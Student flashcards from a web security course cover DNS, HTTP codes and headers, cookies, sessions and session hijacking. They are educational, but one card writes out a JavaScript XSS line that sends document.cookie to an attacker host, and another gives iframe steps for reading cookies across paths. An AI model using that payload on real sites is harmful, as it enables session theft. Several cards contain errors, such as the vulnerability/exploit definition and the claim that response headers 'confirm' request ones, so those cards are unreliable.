CS 253 Web Security Youtube Pt1 Flashcards
What is the difference between a vulnerability and an exploit?
A vulnerability is a part of the site that makes it behave unexpectedly but does not allow one to insert malicious code, unlike an exploit
What reasons are there to attack a computer system?
Spam - To trick people into clicking things
Denial of service - To attack competitors or seek ransom
Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients
Data theft - credentials, credit card numbers, intellectual property
Mine cryptocurrency
Ransomware
Political motivations
What does web security involves?
Browser security, server app security, client app security
It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)
Why is web security hard?
- The web wants to provide the ability to run anyone’s code on your computer securely. Run untrusted code securely.
- Different sites may interact with each other
- Websites have a lot of low-level features (hardware access)
- There is a desire for high performance
- APIs for web browsers were not design from first principles. They have evolved
- Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.
What can websites do that constitute very high security risks?
- Download content from anywhere
- Spawn worker processes
- Open sockets to a server, or even to another user’s browser
- Display media in a huge number of formats
- Run custom code on the GPU
- Save/read data from the filesystem
What does DNS stands for?
Domain Name System
What is the Domain Name System?
A system that translates user friendly domain names into IP addresses
How does DNS querying works?
The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.
How does the DNS server works when performing a DNS query?
The client machine sends the domain name to the DNS server.
The DNS server uses the DNS Recursive Resolver to look up the answer for the domain name. It will continually perform queries to different servers asking if they have information on the domain name, until it gets a positive response.
The queried servers are called nameservers and there are multiple because one of them cannot allocate all of the existing domain names.
What is a good example of a DNS querying process?
Let’s say we try to access the url: https://www.standford.edu
The client sends the domain name (standford.edu) to the DNS Server.
The DNS Server using the DNS Recursive Resolver queries the Root Nameserver. The Root Nameserver does not have the IP Address, so it responds with the instruction to query the “.edu” Nameserver.
The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “standford.edu” Nameserver
The DNS Recursive Resolver queries the “standford.edu” Nameserver. The “standford.edu” Nameserver does have the IP address, so it returns it.
The DNS Recursive Resolver return the received IP address to the Client.
What is a TLD Nameserver?
Its the nameserver that holds all instructions or addresses for a top-level domain.
Example:
.com
.org
.edu
What does the TLD in a TLD Nameserver stands for?
Top-Level Domain Nameserver
What is a top-level domain?
It is the part of the domain name after the dot that is used to indicate the type or category of a website.
Examples:
.com
.org
.edu
What does SLD stands for, regarding domain names?
Second-Level Domain
What is a second-level domain?
It is the part of the domain name before the dot that indicates the name of the website
Examples:
wikipedia.com = wikipedia
brainscape..com =- brainscape
What is a Domain Nameserver?
The Nameserver that holds the information regarding a particular domain name
What is DNS hijacking?
The attacker changes DNS records of target to point to own IP address. After this all site visitors will be directed to the web server of the attacker.
What are the vectors (places) where you DNS hijacking can occur?
- Malware changes user’s local DNS settings
- Hacked recursive DNS resolver
- Hacked router
- Hacked DNS nameserver
- Compromised user account at DNS provider
What does ISP stands for?
Internet Service Provider
Why is it easy for ISPs to sell the lists of the DNS you have queried?
Because the queries are in plaintext .
What can you do to try and avoid ISPs selling your DNS queries lists?
You can consider switching your DNS setting to use the Cloudflare server or any other provider that at least has a good privacy policy.
What do HTTP Status Codes mean in general?
1xx - Informational, you need to hold on some time
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error
What are some well-known HTTP Success status codes?
200 - Ok - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded
What are some well-known HTTP Redirection status codes?
301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached
What are some well-known HTTP Client error codes?
400 - Bad Request - The request was malformed
401 - Unauthorized - Resource is protected, need to authorize
403 - Forbidden - Resource is protected, denying access
404 - Not Found - Resource was not found
What are some well-known HTTP Server error codes?
500 - Internal Server Error - Generic Server Error
502 - Bad Gateway - Server is a proxy; backend server is unreachable
503 - Service Unavailable - Server is overloaded or down for maintenance
504 - Gateway Timeout - Server is a proxy, backend server responded too slowly
What can an HTTP Proxy server do or be useful for?
It can:
- Cache content
- Block content (malware, adult content, etc)
- Modify content
- Sit in front of many servers (reverse proxy)
What is a client-side proxy?
Its a proxy that sits between the client and the web retrieving resources from the internet.
It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.
What is another name for a client-side proxy?
Forward proxy
What is another name for a forward proxy?
A client-side proxy
What are the HTTP headers and what are they good for?
They are essentially a amp of key-value pairs.
They let the client and the server pass additional information with an HTTP request or response.
and therefore it allows experimental extensions to be added to HTTP without requiring protocol changes.
What are 11 of the most useful HTTP request headers?
Host
User-Agent
Referer
Cookie
Range
Cache-Control
If-Modified-Since
Connection
Accept
Accept-Encoding
Accept-Language
What is the Host, HTTP request header used for?
It is meant to contain the domain name of the server
What is the User Agent, HTTP request header used for?
It is meant to contain the name of the browser and operating system.
Technically it contains not the name of the browser, but the name of the User Agent. Which is normally the browser.
What is the Referer, HTTP request header used for?
It is meant to contain the webpage which led you to this page (The word Referer is misspelled, but that’s how it is written in HTTP)
What is the Cookie, HTTP request header used for?
It is meant to keep the cookie the server gave you earlier. This helps you to keep you logged in
What is the Range, HTTP request header used for?
Specifies a subset of bytes to fetch. This is the same Range concept that is used for HTTP 206 response status code.
What is the Cache-Control, HTTP request header used for?
Helps to specify if you want a cached response or not.
What is the If-Modified-Since, HTTP request header used for?
Allows to specify a date time so that the response will only be updated if the resource has been modified since that datetime.
What is the Connection, HTTP request header used for?
Sends instructions to control the TCP socket used for the request, either to maintain it opened or to close it. (keep-alive, close)
What is the Accept, HTTP request header used for?
You can specify which type of response you will accept
Example: text/html
What is the Accept-Encoding, HTTP request header used for?
You can specify which encoding algorithms you understand.
Example: gzip
What is the Accept-Language, HTTP request header used for?
You can specify which language you expect.
Example: es, en
What are 12 of the most useful HTTP response headers?
Date
Last-Modified
Cache-Control
Expires
Vary
Set-Cookie
Location
Connection
Content-Type
Content-Encoding
Content-Language
Content-Length
What is the Date, HTTP response header used for?
It contains when the response was sent.
What is the Last-Modified, HTTP response header used for?
It contains when the content was last modified.
What is the Cache-Control, HTTP response header used for?
It specifies whether you want the client to cache the response or not
What is the Expires, HTTP response header used for?
Contains a date to point out when the browser should discard the response from cache.
What is the Vary, HTTP response header used for?
Contains a list of request headers which affect the response. So the browser will save and check the list of headers in new requests and if they are different it will not use the cache version. Otherwise it will use it.
What is the Set-Cookie, HTTP response header used for?
Sets a cookie value on the client
What is the Location, HTTP response header used for?
Used to redirec the client to another url. This has to be used alongside 3xx response.
What is the Connection, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Type, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Encoding, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Language, HTTP response header used for?
Confirms the HTTP request header counterpart
What is the Content-Length, HTTP response header used for?
Confirms the HTTP request header counterpart
What does HTTP stands for?
Hypertext Transfer Protocol
What does TLS stands for?
Transport Layer Security
What does TCP stands for_
Transmission Control Protocol
What does IP stands for
Internet Protocol
What does the client need to do in order to find the IP of the site it wants to connect to?
It needs to request it through the DNS Server using the domain name
What does the client do after getting the IP address>
It opens a connection using TCP
What does the client does after openning the TCP connection?
It applies TLS encryption, although it is optional
What does the client does after opening the TCP connection and applying (or not) the TLS encryption?
It makes the HTTP request by using the socket opened by TCP.
What happens when you type a URL and press enter?
- Performs a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4)
- Opens a TCP socket to 1.2.3.4 on port 80 (The HTTP port)
- Send an HTTP request that includes the desired path
- Read the HTTP response from the socket
- Parse the HTML into the DOM
- Render the page based on the DOM
- Repeat until all external resources are loaded:
- If there are pending external resources, makes HTTP requests for these (runs steps 1 -4)
- Renders the resources into the page.
What is the syntax for a server to set a cookie on a client?
Set-Cookie: theme=dark;
What is the syntax for a client to send a cookie to the server?
Cookie: theme=dark;
What is a session?
The method in which a server keeps a set of data related to a user’s current “browsing session”
What are some examples in which sessions are commonly implemented?
Logins
Shopping carts
User tracking
What does the term “Access Control” refers to?
To the act of regulating who can view resources in a web site or take actions.
What does the term “Ambient Authority” refers to?
To implementing Access Control, based on a global and persistent property of the requester.
Which types of Ambient Authority exist on the web?
4 in total:
Cookies - the most common and most versatile method
IP checking - used at Stanford for library resources.
Built-in HTTP Authentication - rarely used
Client Certificates - rarely used
What are the signature schemes used normally for implementing Ambien Authority with Cookies?
The triple of algorithms
- Generator
- Signer
- Verifier
What does the generator function does?
It does not receive any input and returns a primary key and a secret key
What does the Signer function does?
Receives the secret key and a value.
It uses the secret key to perform a series of operations on the value and returns a value called tag. (Which is the signed value)
What does the Verifier function does?
It receives the primary key, the original value and the signed value.
Internally it performs a series of operations in order to check the validity of the tag generated from the original value.
How does the process of requests work using the Ambient Authority with Cookies?
- The server generates the pk and sk
- The browser sends a POST login request
- The server validates the user and password
- The server signs the username value and generates a tag
- Server sends back the tag and the username as cookies with the Set-Cookie header
- The Browser sets both cookies as instructed by the server
- The Browser sends future requests with both username and tag in the Cookie header
- The server validates if the tag and username are valid for one another
What are some cookie attributes you can specify?
Expires - Specifies expiration date. If no date, then lasts for a session
Path - Scope the “Cookie” header to a particular request path prefix
Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header
What is the format for the Set-Cookie header sent by the server?
Example:
Set-Cookie: theme=dark;Expires=<date>;</date>
How does Session hijacking works?
When sending cookies over unencrypted HTTP anyone can intercept the cookies and use them to hijack the user’s session.
Once the attacker has the cookie, he can send the victim’s cookie as if it were his own and the server will be fooled into thinking he is the owner of the session.
How can you mitigate a Session hijacking attack?
- You can add the Secure cookie attribute to prevent cookie from bein sent over unencrypted HTTP connections.
Set-Cookie: key=value; Secure
- You use HTTPS over the entire website
Why does using HTTPS mitigates a Session hijacking attack?
Because the data transferred during HTTPS communication is encrypted.
What is a very common form of JS code used in Session hijacking via Cross Site Scripting?
new Image().src = ‘https://attacker.com/steal?cookie=’ + document.cookie
What does XSS stands for?
Cross Site Scripting
What can you do to protect your cookies from XSS?
You can add the attribute HttpOnly to your Set-Cookie header.
This way the cookies will not be accesible through Javascript. Only through HTTP.
Set-Cokkie: key=value; Secure; HttpOnly
Why would one attempt to use the Path attribute for security?
Because the Path attribute allows you to limit the sharing of a cookie to only a specific url path and therefore on paper it wouldn’t allow other unwanted paths to access the cookie.
Why is it not recommended to use the Path attribute for security?
Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin.
It can be bypassed using an <iframe> tag
What are the steps needed to bypass the Path attribute?
- Go to another page and create an iframe element on javascript:
const iframe = document.createElement(‘iframe’)
- Assignt the url from which you want the cookies to the iframe src
iframe.src = ‘https://web.stamdord.edu/class/cd106a’
- Access the document object from the page loaded by the iframe
iframe.contentDocument.cookie
With this you already have unauthourized access to said cookie
What is the best-practice recommendation when using the Path cookie attribute?
To don’t ever use it.
Instead you should set an invalid value for it: Path=/
Example:
Set-Cookie: key=value; Secure; HttpOnly; Path=/